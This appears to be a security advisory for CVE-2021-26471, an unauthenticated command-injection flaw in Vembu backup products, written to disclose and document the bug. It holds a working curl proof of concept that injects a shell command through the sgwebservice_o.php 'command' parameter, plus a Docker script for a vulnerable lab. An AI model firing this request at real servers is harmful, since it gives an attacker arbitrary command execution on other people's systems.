Skip to the content.

CVE-2021-26471 - Unauthenticated remote command execution in Vembu products

CVE CVE-2021-26471
Discovered by
(Additional) researcher(s)
Products
  • VembuBDR
  • VembuOffsiteDR
  • Other products in this family may also be effected
Versions
  • VembuBDR v4.2.0.1
  • VembuBDR v4.2.0
  • VembuBDR v4.1.0
  • VembuBDR v4.0.2
  • VembuBDR v4.0.1
  • VembuBDR v4.0.0
  • VembuBDR v3.9.1 Update1
  • VembuBDR v3.9.0 Update1
  • VembuBDR v3.9.0
  • VembuBDR v3.8.0
  • VembuBDR v3.7.0
  • VembuBDR v3.5.0.0
  • VembuOffsiteDR v4.2.0.1
  • VembuOffsiteDR v4.2.0
  • Other products and versions of products in this family may also be effected
Page author Frank Breedijk
CVSS Base Score 9.8

Summary

The http API located at /sgwebservice_o.php accepts a command argument. Using this command argument an unauthenticated attacker can execute arbitrary shell commands

How to reproduce

Step 1:Start up a docker environment (see below)

Step 2: In a different terminal run the following command:

> $ curl 'http://127.0.0.1:6060/sgwebservice_o.php?Action=StoreSpecialFolder&command=echo%20hacked%20%3E%2Ftmp%2Fdivd_was_here.txt&tempFile=/tmp'
 
<storegrid><saved messsage='Files filtered and cached successfully.Now You can continue your schedule..' error='0'></saved></storegrid>$

Step 3: validate that a file was written in /tmp:


$ docker exec VembuBDR4201 /bin/bash -c "ls -l /tmp;echo ---;cat /tmp/divd_was_here.txt;echo ---"
total 16
-rw-r--r-- 1 www-data www-data    7 Feb 11 15:00 divd_was_here.txt
drwxr-xr-x 1 root     root     4096 Feb 11 14:52 hsperfdata_root
drwxr-xr-x 1 root     root     4096 Feb 11 14:52 vmware
drwx------ 2 root     root     4096 Jun 12  2020 vmware-root
---
hacked
---
$

Impact

This vulnerability allows an attacker to execute an arbitrary (windows/linux) shell command in the context of the httpd process.

About the docker test environment.

In order to set up the docker test environment, we used the following script:

#!/bin/bash
 
# Network
if [[ $(docker network ls |grep vembu-netowrk |wc -l ) -lt 1 ]]; then
  docker network create --subnet=172.18.0.0/16 vembu-network
fi
 
# Start Database container
mkdir DB
while [[ $(docker ps -a |grep VembuDatabase|wc -l) -ge 1 ]]; do
  docker kill VembuDatabase
  docker rm VembuDatabase
  sleep 1
done
docker run --name VembuDatabase --network vembu-network --ip 172.18.0.2 -p 5432:5432 -d -e POSTGRES_PASSWORD=admin -e POSTGRES_USER=postgres -e POSTGRES_DB=SGDatabase -v  $PWD/DB:/vembu vembubdr/bdr-latest:psql-latest
 
# Wait for database port to open
echo -c "Waiting for database to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/5432" ; do 
  echo -c "."
  sleep 1; 
done
echo
 
# Start APP container
mkdir APP
while [[ $(docker ps -a |grep VembuBDR4201|wc -l) -ge 1 ]]; do
  docker kill VembuBDR4201
  docker rm VembuBDR4201
  sleep 1
done
 
docker run --name VembuBDR4201 --network vembu-network --ip 172.18.0.3 --add-host VembuDatabase:172.18.0.2 --privileged=true -i -t -d --device /dev/fuse --privileged -p 6060:6060 -p 32004:32004 -v $PWD/APP:/vembu vembubdr/bdr-latest:vembubdr-4201-u1
 
# Wait for app port to open
echo -c "Waiting for application to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/6060" ; do 
  echo -c "."
  sleep 1; 
done
echo